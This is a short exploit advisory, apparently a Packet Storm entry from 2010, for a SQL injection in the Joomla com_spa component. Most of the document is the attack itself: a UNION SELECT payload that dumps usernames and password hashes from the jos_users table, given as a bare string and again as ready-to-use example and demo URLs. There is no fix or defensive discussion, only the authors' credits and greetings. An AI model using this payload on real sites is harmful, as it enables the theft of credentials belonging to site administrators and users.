Joomla SPA SQL Injection

2010-07-18T00:00:00
ID PACKETSTORM:91942
Type packetstorm
Reporter Palyo34
Modified 2010-07-18T00:00:00

Description

                                        
                                            `===================================================  
Joomla Component (com_spa) SQL Injection Vulnerability  
===================================================  
  
Author : Palyo34 & KroNicKq  
  
Homepage : http://www.1923turk.com  
  
===================================================  
  
  
[+] Vulnerable File :  
  
  
http://www.site.com/index.php?option=com_spa&view=spa_product&cid=[SQL]  
  
  
[+] ExploiT :  
  
-1+union+select concat(username,0x3a,password)+from+jos_users  
  
  
[+] Example :  
  
http://www.site.com/index.php?option=com_spa&view=spa_product&cid=-1+union+select concat(username,0x3a,password)+from+jos_users  
  
  
[+] Demo :  
  
http://www.site.com/index.php?option=com_spa&view=spa_product&cid=-20+union+select+concat(username,0x3a,password)+from+jos_users  
  
  
===================================================  
I Lowe You Joomla :))  
===================================================  
  
Greetz : 1923Turk All Users  
  
`